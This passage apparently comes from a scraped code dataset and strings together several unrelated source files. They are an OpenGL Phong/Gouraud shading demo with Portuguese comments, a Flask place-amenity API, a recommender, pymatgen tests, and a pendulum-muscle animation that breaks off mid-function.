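    # The cross product of two edge (tangent) vectors plays the role of
    # cross(dFdx, dFdy) in the fragment shader described above.
    n = np.cross(p1 - p0, p2 - p0)
    return n / np.linalg.norm(n)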
No Phong shading, o mesmo cálculo é feito, mas com a normal interpolada que a shader\n recebeu como input. No caso do Gouraud shading, a cor dos vértices (que foi interpolada de uma shader para outra)\n simplesmente é usada.\n'''\n\nfragment_shader = '''\n#version 330\nuniform float albedo_r;\nuniform float albedo_g;\nuniform float albedo_b;\nuniform float ks;\nuniform int shading_type;\n\nin vec3 view_position;\nin vec3 pixel_position;\nin vec3 vertex_color;\nin vec3 camera_position;\nin vec3 normal;\nin vec3 light_source;\nin vec4 ambient_light;\n\nout vec4 frag_color;\n\nvoid main()\n{ \n if(shading_type == 0) //flat\n {\n vec3 x_tangent = dFdx(pixel_position);\n vec3 y_tangent = dFdy(pixel_position);\n vec3 face_normal = normalize(cross(x_tangent, y_tangent));\n \n float red_diffuse = albedo_r / 3.14 * dot(face_normal, light_source);\n float green_diffuse = albedo_g / 3.14 * dot(face_normal, light_source);\n float blue_diffuse = albedo_b / 3.14 * dot(face_normal, light_source);\n \n vec3 reflection_vec = 2.0 * dot(light_source, face_normal) * face_normal - light_source;\n float specular = ks * dot(reflection_vec, normalize(camera_position));\n \n specular = max(0.0, specular);\n red_diffuse = max(0.0, red_diffuse);\n green_diffuse = max(0.0, green_diffuse);\n blue_diffuse = max(0.0, blue_diffuse);\n \n frag_color = vec4(red_diffuse + specular, green_diffuse + specular, blue_diffuse + specular, 1.0) + ambient_light;\n }\n else if(shading_type == 1) // gouraud\n {\n frag_color = vec4(vertex_color, 1.0);\n }\n else // phong\n {\n vec3 interpolated_normal = normalize(normal);\n \n float red_diffuse = albedo_r / 3.14 * dot(interpolated_normal, light_source);\n float green_diffuse = albedo_g / 3.14 * dot(interpolated_normal, light_source);\n float blue_diffuse = albedo_b / 3.14 * dot(interpolated_normal, light_source);\n \n vec3 reflection_vec = 2.0 * dot(light_source, interpolated_normal) * interpolated_normal - light_source;\n float specular = ks * dot(reflection_vec, normalize(camera_position));\n \n specular = max(0.0, specular);\n red_diffuse = max(0.0, red_diffuse);\n green_diffuse = max(0.0, green_diffuse);\n blue_diffuse = max(0.0, blue_diffuse);\n \n frag_color = vec4(red_diffuse + specular, green_diffuse + specular, blue_diffuse + specular, 1.0) + ambient_light;\n }\n}\n'''\n\n\n#%%\n'''\n A chaleira foi obtida em [https://graphics.stanford.edu/courses/cs148-10-summer/as3/code/as3/teapot.obj]. O modelo\n contém os vértices e os índices das faces, apenas. Isso faz com que seja necessário calcular as normais de cada\n vértice na CPU para depois passar para a shader (isso seria possível na GPU se OpenGL 3.3 tivesse suporte para\n tesselation shaders, mas decidiu-se optar pela versão 3.3 por questões de compatibilidade).\n \n Em primeiro lugar, o arquivo Wavefront é lido e os valores dos vértices e das faces são guardados em arrays\n bidimensionais do numpy. A biblioteca pyrr tem uma função especial para gerar normais de vértice a partir destes\n valores. Depois que isso é feito, os arrays são transformados em unidimensionais.\n \n Feito isso, os buffers para os três componentes do objeto são criados na GPU para uma melhor performance. 
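Conceptually, per-vertex normals like the ones pyrr produces here can be built by accumulating each face normal onto its three vertices and normalising; a rough sketch of that idea (not pyrr's actual implementation), assuming an (N, 3) float vertex array and an (M, 3) integer face array:

import numpy as np

def vertex_normals(vertices, faces):
    # Accumulate every face normal onto the face's three vertices,
    # then normalise the sums to get smooth per-vertex normals.
    normals = np.zeros_like(vertices)
    for i0, i1, i2 in faces:
        n = np.cross(vertices[i1] - vertices[i0], vertices[i2] - vertices[i0])
        normals[i0] += n
        normals[i1] += n
        normals[i2] += n
    lengths = np.linalg.norm(normals, axis=1, keepdims=True)
    return normals / np.maximum(lengths, 1e-12)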
Ao serem\n    renderizados, eles são chamados por glBindBuffer e passam cada um dos seus inputs para a shader, antes de ser\n    chamada a função glDrawElements(), que pode desenhar os triângulos a partir dos índices de faces.\n'''\n\nclass Teapot():\n    def __init__(self):\n        vertices = []\n        faces = []\n        # obj loader super simples\n        with open('teapot.obj', 'r') as obj: # le os vertices e faces do OBJ\n            for line in obj.readlines():\n                line = line.split(' ')\n                if line[0] == 'v':\n                    vertices.append([float(line[1])/3, float(line[2])/3, float(line[3])/3])\n                elif line[0] == 'f':\n                    faces.append([int(line[1])-1, int(line[2])-1, int(line[3])-1])\n        \n        # calculate vertex normals\n        self.vertices = numpy.array(vertices, dtype=numpy.float32)\n        self.faces = numpy.array(faces, dtype=numpy.uint32)\n        vertex_normals = pyrr.vector3.generate_vertex_normals(self.vertices, self.faces)\n        self.vertex_normals = numpy.array(vertex_normals, dtype=numpy.float32).flatten()\n        self.vertices = numpy.array(vertices, dtype=numpy.float32).flatten()\n        self.faces = numpy.array(faces, dtype=numpy.uint32).flatten()\n\n        self.vbo = glGenBuffers(1)\n        glBindBuffer(GL_ARRAY_BUFFER, self.vbo)\n        glBufferData(GL_ARRAY_BUFFER, len(self.vertices) * 4, self.vertices, GL_STATIC_DRAW)\n        self.ebo = glGenBuffers(1)\n        glBindBuffer(GL_ELEMENT_ARRAY_BUFFER, self.ebo)\n        glBufferData(GL_ELEMENT_ARRAY_BUFFER, len(self.faces) * 4, self.faces, GL_STATIC_DRAW)\n        # as normais alimentam um atributo de vertice, entao o alvo correto e\n        # GL_ARRAY_BUFFER (GL_ELEMENT_ARRAY_BUFFER serve apenas para indices)\n        self.nbo = glGenBuffers(1)\n        glBindBuffer(GL_ARRAY_BUFFER, self.nbo)\n        glBufferData(GL_ARRAY_BUFFER, len(self.vertex_normals) * 4, self.vertex_normals, GL_STATIC_DRAW)\n\n        print(self.vbo, self.ebo, self.nbo)\n    \n    def render(self, shader):\n        glBindBuffer(GL_ARRAY_BUFFER, self.vbo)\n        position = glGetAttribLocation(shader, 'position')\n        glVertexAttribPointer(position, 3, GL_FLOAT, GL_FALSE, 0, ctypes.c_void_p(0))\n        glEnableVertexAttribArray(position)\n        \n        glBindBuffer(GL_ARRAY_BUFFER, self.nbo)\n        vertex_normal = glGetAttribLocation(shader, 'vertex_normal')\n        glVertexAttribPointer(vertex_normal, 3, GL_FLOAT, GL_FALSE, 0, ctypes.c_void_p(0))\n        glEnableVertexAttribArray(vertex_normal)\n        \n        glBindBuffer(GL_ELEMENT_ARRAY_BUFFER, self.ebo)\n        glDrawElements(GL_TRIANGLES, len(self.faces), GL_UNSIGNED_INT, None)\n\n\n#%%\n'''\n    O material de Phong é definido pelo tipo de shading, a sua cor e a constante especular. Isso pode ser modelado\n    facilmente e passado como parâmetro para a shader em tempo real como uniform, como ocorre nesta classe.\n'''\n\n# material\nclass PhongMaterial:\n    def __init__(self, shader, shading_type, albedo_r, albedo_g, albedo_b, specular_constant):\n        self.shader = shader\n        self.shading_type = shading_type\n        self.albedo = [albedo_r, albedo_g, albedo_b]\n        self.specular_constant = specular_constant\n    def set_up_rendering(self):\n        glUseProgram(self.shader)\n        \n        #lighting uniforms\n        r = glGetUniformLocation(self.shader, 'albedo_r')\n        g = glGetUniformLocation(self.shader, 'albedo_g')\n        b = glGetUniformLocation(self.shader, 'albedo_b')\n        glUniform1f(r, self.albedo[0])\n        glUniform1f(g, self.albedo[1])\n        glUniform1f(b, self.albedo[2])\n        \n        ks = glGetUniformLocation(self.shader, 'ks')\n        glUniform1f(ks, self.specular_constant)\n        \n        st = glGetUniformLocation(self.shader, 'shading_type')\n        if self.shading_type == 'gouraud':\n            glUniform1i(st, 1)\n        elif self.shading_type == 'phong':\n            glUniform1i(st, 2)\n        else:\n            glUniform1i(st, 0)\n\n\n#%%\n'''\n    A classe Shape contém um material do tipo PhongMaterial e um tipo de forma, que é uma das strings 'sphere', 'cylinder' ou 'teapot'. 
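The per-channel arithmetic that both shaders repeat is the standard Phong model; as a reference, a NumPy transcription for a single light, with all direction vectors assumed normalised (hypothetical helper, mirroring the GLSL above rather than replacing it):

import numpy as np

def phong_shade(albedo, ks, normal, light, view):
    # Diffuse term: (albedo / pi) * max(0, dot(N, L)), one value per channel.
    diffuse = np.maximum(0.0, (albedo / np.pi) * np.dot(normal, light))
    # Specular term: ks * max(0, dot(R, V)), with R = 2*dot(L, N)*N - L.
    reflection = 2.0 * np.dot(light, normal) * normal - light
    specular = max(0.0, ks * float(np.dot(reflection, view)))
    return diffuse + specular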
A\n função set_up_rendering() do material é chamada a cada frame porque é nela que são passados os uniforms de ilumi-\n nação da shader.\n \n No método render(), são calculadas as matrizes de transformação que serão passadas como uniforms para as shaders.\n Em seguida, é avaliado qual dos tipos de forma está sendo renderizado. Caso seja um cilindro ou uma esfera, as \n normais são transferidas ao valor default antes mencionado, por uma função glVertexAttrib3f(). Quando chamamos a\n função glDisableVertexAttribArray(loc), a última chamada de glVertexAttrib3f() em 'loc' será o valor transferido\n para a shader. Isso não é necessário caso a forma seja uma chaleira, onde as normais terão sido computadas na CPU\n com antecedência.\n'''\n\nclass Shape:\n def __init__(self, shape_type, material):\n self.material = material\n self.shape_type = shape_type\n self.teapot = Teapot()\n def render(self):\n self.material.set_up_rendering()\n \n #transformation uniforms\n model_transform = pyrr.Matrix44.identity()\n perspective_transform = pyrr.Matrix44.perspective_projection(45, 4/3, 0.01, 100)\n camera_transform = pyrr.Matrix44.look_at((2, 2, 2), (0, 0, 0), (0, 1, 0))\n \n mt_loc = glGetUniformLocation(self.material.shader, 'model_transform')\n glUniformMatrix4fv(mt_loc, 1, GL_FALSE, model_transform)\n pr_loc = glGetUniformLocation(self.material.shader, 'projection')\n glUniformMatrix4fv(pr_loc, 1, GL_FALSE, perspective_transform)\n cam_loc = glGetUniformLocation(self.material.shader, 'camera')\n glUniformMatrix4fv(cam_loc, 1, GL_FALSE, camera_transform)\n cam_pos_loc = glGetUniformLocation(self.material.shader, 'camera_pos_input')\n glUniform3f(cam_pos_loc, 2, 2, 2)\n \n qobj = gluNewQuadric()\n gluQuadricNormals(qobj, GLU_SMOOTH)\n gluQuadricOrientation(qobj, GLU_OUTSIDE)\n if self.shape_type == 'sphere':\n vn = glGetAttribLocation(self.material.shader, 'vertex_normal')\n glVertexAttrib3f(vn, 0.0, 0.0, 0.0)\n glDisableVertexAttribArray(vn)\n gluSphere(qobj, 1, 50, 50)\n elif self.shape_type == 'cylinder':\n vn = glGetAttribLocation(self.material.shader, 'vertex_normal')\n glVertexAttrib3f(vn, 0.0, 0.0, 0.0)\n glDisableVertexAttribArray(vn)\n gluCylinder(qobj, 1, 1, 1, 50, 50)\n else:\n self.teapot.render(self.material.shader)\n\n\n#%%\n'''\n Nesta cela são definidos os inputs para controlar o programa. 
São definidos da seguinte forma:\n ← e → aumentam ou diminuem um valor, que será, dependendo da outra tecla que estiver pressionada:\n cor vermelha, caso seja R\n cor verde para a tecla G\n cor azul caso seja B\n constante de especularidade, no caso de S\n A tecla enter muda o tipo de shading ciclicamente de flat para Gouraud para Phong, e a tecla space muda a forma\n de esfera para cilindro para chaleira.\n'''\n\ndef get_input(window, shape, flags):\n if glfw.get_key(window, glfw.KEY_LEFT) == glfw.PRESS:\n if glfw.get_key(window, glfw.KEY_S) == glfw.PRESS:\n shape.material.specular_constant -= 0.001\n if shape.material.specular_constant <= 0:\n shape.material.specular_constant = 0\n \n if glfw.get_key(window, glfw.KEY_R) == glfw.PRESS:\n shape.material.albedo[0] -= 0.01\n if shape.material.albedo[0] <= 0:\n shape.material.albedo[0] = 0\n \n if glfw.get_key(window, glfw.KEY_G) == glfw.PRESS:\n shape.material.albedo[1] -= 0.01\n if shape.material.albedo[1] <= 0:\n shape.material.albedo[1] = 0\n \n if glfw.get_key(window, glfw.KEY_B) == glfw.PRESS:\n shape.material.albedo[2] -= 0.01\n if shape.material.albedo[2] <= 0:\n shape.material.albedo[2] = 0\n \n if glfw.get_key(window, glfw.KEY_RIGHT) == glfw.PRESS:\n if glfw.get_key(window, glfw.KEY_S) == glfw.PRESS:\n shape.material.specular_constant += 0.001\n if shape.material.specular_constant >= 1:\n shape.material.specular_constant = 1\n \n if glfw.get_key(window, glfw.KEY_R) == glfw.PRESS:\n shape.material.albedo[0] += 0.01\n if shape.material.albedo[0] >= 1:\n shape.material.albedo[0] = 1\n \n if glfw.get_key(window, glfw.KEY_G) == glfw.PRESS:\n shape.material.albedo[1] += 0.01\n if shape.material.albedo[1] >= 1:\n shape.material.albedo[1] = 1\n \n if glfw.get_key(window, glfw.KEY_B) == glfw.PRESS:\n shape.material.albedo[2] += 0.01\n if shape.material.albedo[2] >= 1:\n shape.material.albedo[2] = 1\n \n if glfw.get_key(window, glfw.KEY_ENTER) == glfw.PRESS and not flags[0]:\n if shape.material.shading_type == 'flat':\n shape.material.shading_type = 'gouraud'\n elif shape.material.shading_type == 'gouraud':\n shape.material.shading_type = 'phong'\n elif shape.material.shading_type == 'phong':\n shape.material.shading_type = 'flat'\n flags[0] = True\n \n if glfw.get_key(window, glfw.KEY_ENTER) == glfw.RELEASE:\n flags[0] = False\n\n if glfw.get_key(window, glfw.KEY_SPACE) == glfw.PRESS and not flags[1]:\n if shape.shape_type == 'sphere':\n shape.shape_type = 'cylinder'\n elif shape.shape_type == 'cylinder':\n shape.shape_type = 'teapot'\n elif shape.shape_type == 'teapot':\n shape.shape_type = 'sphere'\n flags[1] = True\n \n if glfw.get_key(window, glfw.KEY_SPACE) == glfw.RELEASE:\n flags[1] = False\n\n\n#%%\n'''\n Chegando à função main(), podemos fazer algumas considerações finais.\n \n Percebe-se que o resultado do flat shading é o esperado, com o triangulado que é característico, o que faz com que\n a luz especular seja \"quebrada\" entre as formas das faces por conta da sua uniformidade na face. Percebe-se também\n que o Gourand shading, por mais que tenha sido revolucionário para a sua época, não funciona tão bem quanto o Phong\n shading.\n\n Isso se pode observar claramente por exemplo na forma de cilindro, onde as partes sombreadas e com incidência de luz\n especular são quebradas. 
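A small numeric illustration of why the two shadings differ: averaging shaded vertex colours (Gouraud) cannot recreate a highlight that peaks between two vertices, while shading the interpolated normal (Phong) can. Hypothetical unit vectors and a simplified specular lobe:

import numpy as np

light = np.array([0.0, 0.0, 1.0])

def spec(n):
    # Simplified specular lobe: max(0, dot(N, L)).
    return max(0.0, float(np.dot(n, light)))

n0 = np.array([0.6, 0.0, 0.8])
n1 = np.array([-0.6, 0.0, 0.8])

gouraud = 0.5 * (spec(n0) + spec(n1))    # 0.8: the peak is averaged away
mid = 0.5 * (n0 + n1)
phong = spec(mid / np.linalg.norm(mid))  # 1.0: the peak survives per pixel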
Isso ocorre porque a interpolação linear entre as cores dos vértices pode ter discontinui-\n dades, ao contrário de como seria a partir do momento em que se considera a normal interpolada de cada pixel, como\n no Phong shading, que não apresenta os problemas mencionados anteriormente.\n \n Podemos concluir assim que o modelo de iluminação de Phong é um modelo de implementação simples e com uma aparência\n aceitável, porém que ainda tem muitos problemas. Nenhum dos objetos parece de fato muito realista, e isso se deve a\n diversos fatores. Em primeiro lugar, eles são muito \"lisos\", e isso é porque as suas normais são muito uniformes. Na\n realidade, as superfícies são mais rugosas que estas. Para resolver este problema, uma possível melhoria que não\n está no escopo deste trabalho é a implementação de texturização e bump mapping, para incrementar a rugosidade da\n superfície. Além disso, com o poder computacional de hoje em dia, podemos fazer materiais melhores usando modelos\n que não são de Phong, como o PBR [https://en.wikipedia.org/wiki/Physically_based_rendering]. Mesmo assim, didatica-\n mente, os materiais de Phong por sua simplicidade têm um grande valor na academia.\n'''\n\ndef main():\n if not glfw.init():\n return\n window = glfw.create_window(1280, 760, 'Shadings', None, None)\n if not window:\n glfw.terminate()\n return\n \n glfw.make_context_current(window)\n \n glClearColor(0.2, 0.3, 0.2, 1.0)\n glEnable(GL_DEPTH_TEST)\n glCullFace(GL_BACK)\n \n shader = shaders.compileProgram(shaders.compileShader(vertex_shader, GL_VERTEX_SHADER), shaders.compileShader(fragment_shader, GL_FRAGMENT_SHADER))\n shape = Shape('sphere', PhongMaterial(shader, 'flat', .0, .5, .5, 0.05)) # valores default iniciais\n key_flags = [False, False]\n \n while not glfw.window_should_close(window):\n glfw.poll_events()\n glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)\n get_input(window, shape, key_flags)\n shape.render()\n glfw.swap_buffers(window)\n glfw.terminate()\n \nif __name__ == '__main__':\n main()\n\n\n#%%\n\n\n\n","sub_path":"tp1/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":20523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"434391474","text":"# ===============================================================================\n# Copyright 2011 Jake Ross\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ===============================================================================\n\n# ============= enthought library imports =======================\nfrom traits.api import HasTraits, Instance\nfrom traitsui.api import View, Item\n# ============= standard library imports ========================\n\n# ============= local library imports ==========================\nfrom pychron.modeling.model_data_directory import ModelDataDirectory\n\n# ============= views ===================================\nclass InfoView(HasTraits):\n data_directory = Instance(ModelDataDirectory)\n\n def selected_update(self, obj, name, old, 
new):\n        if not isinstance(new, ModelDataDirectory):\n            try:\n                new = new[0]\n            except (IndexError, TypeError):\n                return\n        self.data_directory = new\n\n    def traits_view(self):\n        v = View(\n            Item('data_directory',\n                 style='custom',\n                 show_label=False),\n        )\n        return v\n","sub_path":"pychron/modeling/plugins/info_view.py","file_name":"info_view.py","file_ext":"py","file_size_in_byte":1668,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"236060914","text":"#!/usr/bin/python3\n\"\"\" Creates a view for linked Place/Amenity objects \"\"\"\n\nfrom api.v1.views import app_views\nfrom flask import jsonify, abort, request\nfrom models import storage\nfrom models.place import Place\nfrom models.amenity import Amenity\nfrom os import getenv\n\n\n@app_views.route(\"/places/<place_id>/amenities\", methods=[\"GET\"],\n                 strict_slashes=False)\ndef places_get(place_id):\n    \"\"\" Route retrieves Amenity objects connected to a Place object \"\"\"\n    place = storage.get(Place, place_id)\n    if place is None:\n        abort(404)\n    if request.method == \"GET\":\n        list_amenities = []\n        if getenv(\"HBNB_TYPE_STORAGE\") == \"db\":\n            for item in place.amenities:\n                list_amenities.append(item.to_dict())\n        else:\n            for item in place.amenity_ids:\n                list_amenities.append(storage.get(Amenity, item).to_dict())\n        return jsonify(list_amenities)\n\n\n@app_views.route(\"/places/<place_id>/amenities/<amenity_id>\",\n                 methods=[\"DELETE\", \"POST\"],\n                 strict_slashes=False)\ndef amenities_delete_post(place_id, amenity_id):\n    \"\"\" Route deletes or links an Amenity object for a Place \"\"\"\n    place = storage.get(Place, place_id)\n    if place is None:\n        abort(404)\n    amenity = storage.get(Amenity, amenity_id)\n    if amenity is None:\n        abort(404)\n    if request.method == \"DELETE\":\n        if getenv(\"HBNB_TYPE_STORAGE\") == \"db\":\n            if amenity not in place.amenities:\n                abort(404)\n            place.amenities.remove(amenity)\n        else:\n            if amenity.id not in place.amenity_ids:\n                abort(404)\n            place.amenity_ids.remove(amenity.id)\n        place.save()\n        return jsonify({}), 200\n    else:\n        if getenv(\"HBNB_TYPE_STORAGE\") == \"db\":\n            if amenity in place.amenities:\n                return jsonify(amenity.to_dict()), 200\n            place.amenities.append(amenity)\n        else:\n            if amenity_id in place.amenity_ids:\n                return jsonify(amenity.to_dict()), 200\n            place.amenity_ids.append(amenity_id)\n        place.save()\n        return jsonify(amenity.to_dict()), 201\n","sub_path":"api/v1/views/places_amenities.py","file_name":"places_amenities.py","file_ext":"py","file_size_in_byte":2212,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
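The places_amenities.py record above implements the usual HBnB link/unlink semantics: GET lists, POST links (201 on creation, 200 if already linked), DELETE unlinks. A hedged client-side sketch exercising those routes follows; the host, port, API prefix, and both UUIDs are placeholders, not values from the original file.

```python
# Hypothetical client calls against the routes above, assuming the API is
# served at localhost:5000 under /api/v1 (a common HBnB layout); the ids
# below are placeholders.
import requests

BASE = "http://localhost:5000/api/v1"
place_id = "00000000-place-example"      # placeholder Place id
amenity_id = "00000000-amenity-example"  # placeholder Amenity id

# List amenities linked to a place
r = requests.get(f"{BASE}/places/{place_id}/amenities")
print(r.status_code, r.json())

# Link an amenity (201 on creation, 200 if already linked)
r = requests.post(f"{BASE}/places/{place_id}/amenities/{amenity_id}")
print(r.status_code)

# Unlink it again (200 with an empty JSON body)
r = requests.delete(f"{BASE}/places/{place_id}/amenities/{amenity_id}")
print(r.status_code)
```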
{"seq_id":"73977752","text":"\"\"\"\n=================== TASK 5 ====================\n* Name: Average Value\n*\n* Write a function `averageval` that will take an\n* integer list as an argument and return the \n* average value of the list elements. \n*\n* Note: Please describe in detail possible cases\n* in which your solution might not work. It is not\n* allowed to use built-in functions.\n*\n* Use main() function to test your solution.\n===================================================\n\"\"\"\ndef averageval(numlist):\n    # Count and sum manually, since built-in functions (including len)\n    # are not allowed. This raises ZeroDivisionError for an empty list,\n    # and would perform integer division on Python 2.\n    numberOfElements = 0\n    sum = 0\n    for number in numlist:\n        sum = sum + number\n        numberOfElements = numberOfElements + 1\n    return sum / numberOfElements\n\ndef main():\n    numlist = [1, 2, 3, 4, 5]\n    avg = averageval(numlist)\n    print(\"Average val is: \", avg)\nmain()","sub_path":"task5.py","file_name":"task5.py","file_ext":"py","file_size_in_byte":766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"613673269","text":"import numpy as np\n\nfrom pymatgen.analysis.defects.supercells import (\n    _ase_cubic,\n    get_matched_structure_mapping,\n    get_sc_fromstruct,\n)\n\n\ndef test_supercells(gan_struct):\n    uc = gan_struct.copy()\n    sc_mat = get_sc_fromstruct(uc)\n    sc = uc * sc_mat\n    assert sc_mat.shape == (3, 3)\n\n    sc_mat2, _ = get_matched_structure_mapping(uc, sc)\n    assert sc_mat2.shape == (3, 3)\n    sc2 = uc * sc_mat2\n    np.testing.assert_allclose(\n        sc.lattice.abc, sc2.lattice.abc\n    )  # the sc_mat can be reconstructed from the sc\n\n\ndef test_ase_supercells(gan_struct):\n    sc_mat = _ase_cubic(gan_struct, min_atoms=4, max_atoms=8)\n    sc = gan_struct * sc_mat\n    assert 4 <= sc.num_sites <= 8\n","sub_path":"tests/test_supercells.py","file_name":"test_supercells.py","file_ext":"py","file_size_in_byte":702,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"5693733","text":"#!/usr/bin/env python\n\nimport numpy as np\n\n\nclass Recommender(object):\n\n    def fit(self, URM_train):\n\n        self.URM_train = URM_train\n\n        itemPopularity = (URM_train>0).sum(axis=0)\n        itemPopularity = np.array(itemPopularity).squeeze()\n\n        # We are not interested in the sorted popularity values themselves,\n        # but in ordering the items according to them\n        self.popularItems = np.argsort(itemPopularity)\n        self.popularItems = np.flip(self.popularItems, axis = 0)\n\n\n    def recommend(self, topRemoved=5):\n\n        recommended_items = self.popularItems[0:topRemoved]\n\n        return recommended_items\n","sub_path":"recommender_system/classes/recommenders/TopPopRecMod.py","file_name":"TopPopRecMod.py","file_ext":"py","file_size_in_byte":621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"283049317","text":"\"\"\" Lab 6 System Animation\"\"\"\n\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as animation\nimport numpy as np\nfrom muscle_system import MuscleSystem\n\n\nclass SystemAnimation(object):\n    \"\"\" SystemAnimation\n\n    \"\"\"\n\n    def __init__(\n            self,\n            res_sys,\n            pendulum_sys,\n            muscle_sys,\n            neural_sys=None,\n            fps=50\n    ):\n        super(SystemAnimation, self).__init__()\n\n        self.pendulum_sys = pendulum_sys\n        self.muscle_sys = muscle_sys\n        self.neural_sys = neural_sys\n        self.time = res_sys[:, 0]\n        self.state = res_sys[:, 1:]\n\n        # Define positions for neurons\n        self.neurons_pos = np.asarray([[-.5, .5],\n                                       [.5, .5],\n                                       [-0.25, 0.25],\n                                       [0.25, 0.25]])\n        self.fps = fps\n        self.fig, self.ax = plt.subplots(num=\"Simulation\")\n\n        self.anims = self.animation_objects()\n        t_max = self.time[-1]\n        dt = 1 / float(fps)\n\n        self.anim_link = animation.FuncAnimation(\n            self.fig, self._animate, np.arange(0, t_max, dt),\n            interval=1e3 / float(fps), blit=True\n        )\n        plt.title(\"LAB 6 : Neuromuscular simulation\")\n        plt.axis('scaled')\n        # plt.axis('off')\n        self.ax.axes.xaxis.set_visible(False)\n        self.ax.axes.yaxis.set_visible(False)\n        
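The TopPopRecMod.py record above ranks items purely by how many users interacted with them. A tiny end-to-end check of that idea follows, using a toy user-rating matrix; the class body is reproduced inline so the sketch stays self-contained, and a dense numpy array stands in for the sparse URM the original presumably receives.

```python
# Sketch: fitting a top-popularity recommender on a 3-user / 4-item toy
# matrix. (URM > 0).sum(axis=0) counts, per item, how many users rated it.
import numpy as np

class Recommender:
    def fit(self, URM_train):
        item_popularity = np.array((URM_train > 0).sum(axis=0)).squeeze()
        # order items from most to least popular
        self.popularItems = np.flip(np.argsort(item_popularity), axis=0)

    def recommend(self, topRemoved=5):
        return self.popularItems[0:topRemoved]

urm = np.array([[1, 0, 3, 0],
                [2, 2, 4, 0],
                [0, 1, 5, 0]])
rec = Recommender()
rec.fit(urm)
print(rec.recommend(topRemoved=2))  # item 2 first (3 ratings), then item 1
```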
self.ax.set_frame_on('True')\n limit = 1.25 * self.pendulum_sys.parameters.L\n if limit < 0.5:\n limit = .5\n plt.axis([-limit, limit,\n -1.5*limit, limit])\n plt.grid(False)\n return\n\n def animation_objects(self):\n \"\"\" Create and return animation objects \"\"\"\n\n blue = (0.0, 0.3, 1.0, 1.0)\n\n # Origin\n self.ax.plot(\n [0, ], [-1, ], color='k', marker='o', markersize=12.5,\n zorder=4\n )\n\n # Pendulum\n pendulum = self.pendulum_sys.pose()\n self.line, = self.ax.plot(\n pendulum[:, 0],\n pendulum[:, 1] - 1.0,\n color=blue,\n linewidth=5,\n animated=True,\n zorder=1\n )\n # Mass\n self.m, = self.ax.plot(\n self.pendulum_sys.origin[0], self.pendulum_sys.parameters.L-1,\n color=blue, marker='o', markersize=12.5, animated=True\n )\n # Base\n self.ax.plot(\n [0.0, 0.0], [-1, 0], c='g', linewidth=7.5\n )\n\n # Muscles\n self.muscle_sys.update_attachment_position(self.state[0, 0])\n\n muscles = [\n self.ax.plot(\n m[:, 0], m[:, 1], color='r', linewidth=3.5, animated=True\n )[0]\n for m in [\n self.muscle_sys.muscle_1_pos_curr,\n self.muscle_sys.muscle_2_pos_curr,\n ]\n ]\n\n # Time\n time = self.ax.text(\n -0.2, 1.05, \"Time: 0.0\", fontsize=14, animated=True\n )\n\n # Neurons\n if self.neural_sys is not None:\n neurons = [self.ax.scatter(\n self.neurons_pos[:, 0], self.neurons_pos[:, 1],\n s=np.ones(4) * 350, c='r', animated=True, alpha=0.5)]\n for n in range(4):\n self.ax.text(\n self.neurons_pos[n, 0], self.neurons_pos[n, 1],\n \"N{}\".format(n+1), fontsize=11, animated=False,\n zorder=10, horizontalalignment='center',\n verticalalignment='center'\n )\n\n #: connections\n weights = (np.asarray(self.neural_sys.w)).T\n connections = np.nonzero(weights)\n for i, j in zip(connections[0], connections[1]):\n weight = weights[i, j]\n color = \"red\" if weight < 0.0 else \"green\"\n start = [self.neurons_pos[j, 0], self.neurons_pos[j, 1]]\n end = [self.neurons_pos[i, 0], self.neurons_pos[i, 1]]\n SystemAnimation.draw_arrow(\n self.ax, start, end, color=color)\n start = [self.neurons_pos[0, 0], self.neurons_pos[0, 1]]\n end = [self.neurons_pos[0, 0], self.neurons_pos[0, 1]]\n handle1 = SystemAnimation.draw_arrow(\n self.ax, start, end, color=\"green\")\n start = [self.neurons_pos[1, 0], self.neurons_pos[1, 1]]\n end = [self.neurons_pos[1, 0], self.neurons_pos[1, 1]]\n handle2 = SystemAnimation.draw_arrow(\n self.ax, start, end, color=\"green\",\n connectionstyle=\"arc3,rad=-0.3\"\n )\n return (\n [self.line, self.m] + muscles + [time] +\n neurons + [handle1] + [handle2]\n )\n return [self.line, self.m] + muscles + [time]\n\n @staticmethod\n def draw_arrow(ax, start, end, **kwargs):\n \"\"\" Draw arrow. 
\"\"\"\n handle = ax.annotate(\n \"\",\n xy=(start[0], start[1]),\n xycoords='data',\n xytext=(end[0], end[1]),\n textcoords='data',\n arrowprops=dict(arrowstyle=\"->\",\n color=kwargs.pop(\"color\", \"0.5\"),\n shrinkA=5, shrinkB=5,\n patchA=None, patchB=None,\n connectionstyle=kwargs.pop(\n \"connectionstyle\", \"arc3,rad=0.3\")\n ),\n )\n return handle\n\n @staticmethod\n def animate():\n \"\"\"Animate System\"\"\"\n plt.show()\n return\n\n def _animate(self, time):\n \"\"\" Animation \"\"\"\n index = np.argmin((self.time - time)**2)\n self.pendulum_sys.theta = self.state[index, 0]\n pendulum = self.pendulum_sys.pose()\n\n # Pendulum\n self.anims[0].set_xdata(pendulum[:, 0])\n self.anims[0].set_ydata(pendulum[:, 1]-1)\n\n # Mass\n self.anims[1].set_xdata([pendulum[1, 0]])\n self.anims[1].set_ydata([pendulum[1, 1] - 1])\n\n # Muscles\n self.muscle_sys.update_attachment_position(self.state[index, 0])\n muscles = [\n self.muscle_sys.muscle_1_pos_curr,\n self.muscle_sys.muscle_2_pos_curr,\n ]\n activations = [self.state[index, 2], self.state[index, 4]]\n for i, musc in enumerate(self.anims[2:4]):\n musc.set_color((activations[i], 0.0, 0.0, 1.0))\n 